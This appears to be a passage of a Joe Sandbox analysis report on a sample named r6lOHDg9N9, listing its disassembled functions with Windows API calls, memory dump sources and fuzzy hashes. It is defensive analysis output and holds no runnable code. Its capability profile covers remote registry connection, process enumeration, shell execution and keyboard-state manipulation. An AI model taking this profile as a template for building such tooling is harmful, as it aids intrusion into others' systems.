                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                              • String ID:
                                                                              • API String ID: 3424476444-0
                                                                              • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                              • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                              • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                              • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                              Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                              • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                              • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                              • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                              Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID:
                                                                              • API String ID: 535477410-0
                                                                              • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                              • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                              • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                              Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _memset.LIBCMT ref: 004538C4
                                                                              • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                              • _wcslen.LIBCMT ref: 00453960
                                                                              • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 3530711334-4108050209
                                                                              • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                              • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                              • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                              • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                              Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                              • String ID: HH
                                                                              • API String ID: 3488606520-2761332787
                                                                              • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                              • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                              • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                              Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                              • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                              Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                              • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                              Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 288456094-0
                                                                              • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                              • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                              Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004449B0
                                                                              • GetKeyboardState.USER32(?), ref: 004449C3
                                                                              • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                              • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                              Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00444BA9
                                                                              • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                              • SetKeyboardState.USER32(?), ref: 00444C08
                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                              • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                              Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                              • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                              Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                              • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                              Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00457C34
                                                                              • _memset.LIBCMT ref: 00457CE8
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                              • String ID: <$@
                                                                              • API String ID: 1325244542-1426351568
                                                                              • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                              • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                              Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                              • __wsplitpath.LIBCMT ref: 004737E1
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004737F6
                                                                              • __wcsicoll.LIBCMT ref: 00473818
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                              • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                              Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                              • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                              • String ID:
                                                                              • API String ID: 2354583917-0
                                                                              • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                              • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                              Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetMenu.USER32 ref: 004776AA
                                                                              • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                              • _wcslen.LIBCMT ref: 0047771A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
